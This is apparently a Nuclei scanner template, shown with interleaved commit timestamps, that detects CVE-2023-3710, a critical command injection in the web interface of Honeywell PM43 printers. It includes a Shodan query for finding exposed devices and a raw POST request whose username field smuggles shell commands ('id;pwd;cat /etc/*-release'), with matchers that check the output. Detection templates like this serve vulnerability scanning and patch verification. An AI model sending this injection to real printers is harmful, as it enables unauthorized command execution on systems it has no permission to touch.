2023-10-15 13:57:25 +00:00
id : CVE-2023-3710
info :
name : Honeywell PM43 Printers - Command Injection
author : win3zz
2023-10-16 05:10:56 +00:00
severity : critical
2023-10-15 13:57:25 +00:00
description : |
2023-10-16 05:10:56 +00:00
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
2023-10-15 13:57:25 +00:00
reference :
2023-10-16 05:10:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-3710
2023-10-15 13:57:25 +00:00
- https://github.com/vpxuser/CVE-2023-3710-POC
2023-10-16 05:10:56 +00:00
- https://twitter.com/win3zz/status/1713451282344853634
2023-10-16 10:59:03 +00:00
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
2023-10-16 05:10:56 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-3710
2023-11-14 16:35:16 +00:00
cwe-id : CWE-77,CWE-20
2023-11-16 10:31:49 +00:00
epss-score : 0.74016
epss-percentile : 0.97809
2023-10-16 05:10:56 +00:00
cpe : cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
2023-10-15 13:57:25 +00:00
metadata :
2023-10-16 10:50:20 +00:00
verified : true
2023-10-16 10:59:03 +00:00
max-request : 1
vendor : honeywell
product : pm43_firmware
2023-10-16 10:50:20 +00:00
shodan-query : http.html:"/main/login.lua?pageid="
2023-10-16 05:10:56 +00:00
tags : cve,cve2023,honeywell,pm43,printer,iot,rce
2023-10-15 13:57:25 +00:00
http :
2023-10-16 10:50:20 +00:00
- raw :
- |
POST /loadfile.lp?pageid=Configure HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
2023-10-16 05:10:56 +00:00
2023-10-15 13:57:25 +00:00
matchers-condition : and
matchers :
2023-10-16 05:10:56 +00:00
- type : regex
part : body
regex :
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
2023-10-15 13:57:25 +00:00
- type : word
2023-10-16 05:10:56 +00:00
part : body
2023-10-15 13:57:25 +00:00
words :
2023-10-16 05:10:56 +00:00
- 'Release date'
- type : status
status :
- 200
2023-11-15 11:17:20 +00:00
# digest: 4b0a00483046022100a2e6d429c658e182b5e4b72623ba067413f18a96e6d751bc8c87ec010f89cc6d022100ae34bf03a122e65592cac47f9b0612ba014e3936c165f0ea9a2dc975506f9da9:922c64590222798bb761d5b6d8e72950